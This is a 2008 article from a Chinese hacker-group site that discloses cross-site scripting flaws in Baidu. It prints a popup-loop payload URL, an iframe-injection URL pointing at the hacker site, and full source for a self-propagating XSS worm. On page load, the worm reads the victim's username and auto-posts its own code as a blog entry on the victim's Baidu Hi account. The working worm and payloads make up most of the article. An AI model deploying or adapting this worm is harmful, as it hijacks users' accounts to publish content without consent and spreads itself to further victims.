| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 新闻中心 >> 业界动态 >> 文章正文 用户登录 新用户注册
  [图文]百度暴xssworm   跨站 漏洞       ★★★ 【字体:
百度暴xssworm 跨站 漏洞
作者:血腥魔术…    文章来源:本站原创    点击数:    更新时间:2008-7-3    

 

 

http://www.baidu.com/index.php?bar=[/url]"/**/style=xss:expression(alert('xss'));


有点死循环的性质,无限弹窗.


<div id="xssworm">.
<form name="form1" id="popFormSubmit" action="" method="post">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" id="url" name="spRefURL" value="">
<input type="hidden" id="title" name="spBlogTitle" value="百度又有新漏洞啦-F14r3">
<input type="hidden" id="content" name="spBlogText" value="">
<input type="hidden" name="spBlogCatName" value="默认分类">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spVcode" value="">
<input type="hidden" name="spVerifyKey" value="">
<input type="hidden" name="tj" value=" 发表文章 " >
</form>
<script>
function $(i){return document.getElementById(i);}
window.onload = function(){
    var j=document.body.innerText;
    var i=j.indexOf("|");
    j=j.substr(0,i);
    form1.action = "http://hi.baidu.com/"+j+"/commit";
    $("content").value = escape($("xssworm").outerHTML);
    form1.submit();
}
</script>
</div>

跨站漏洞:

http://bk.baidu.com/s?wd=</title><iframe%20src=http://www.cnxhacker.com></iframe

 

文章录入:血腥魔术师    责任编辑:血腥魔术师 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    Apple Mac OS X CoreGraphic
    phpwind任意修改管理员密码漏
    安全杂谈:企业安全建设中的
    鲍尔默:微软每年至少投资25
    瑞星07月25日发布 每日病毒及
    已有黑客在研制利用DNS漏洞程
    腾讯官方版Linux QQ将于本月
    无法进入安全模式 可能中招“
    瑞星公司07月15日发布 每日计
    微软七月安全公告预告:四个重
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.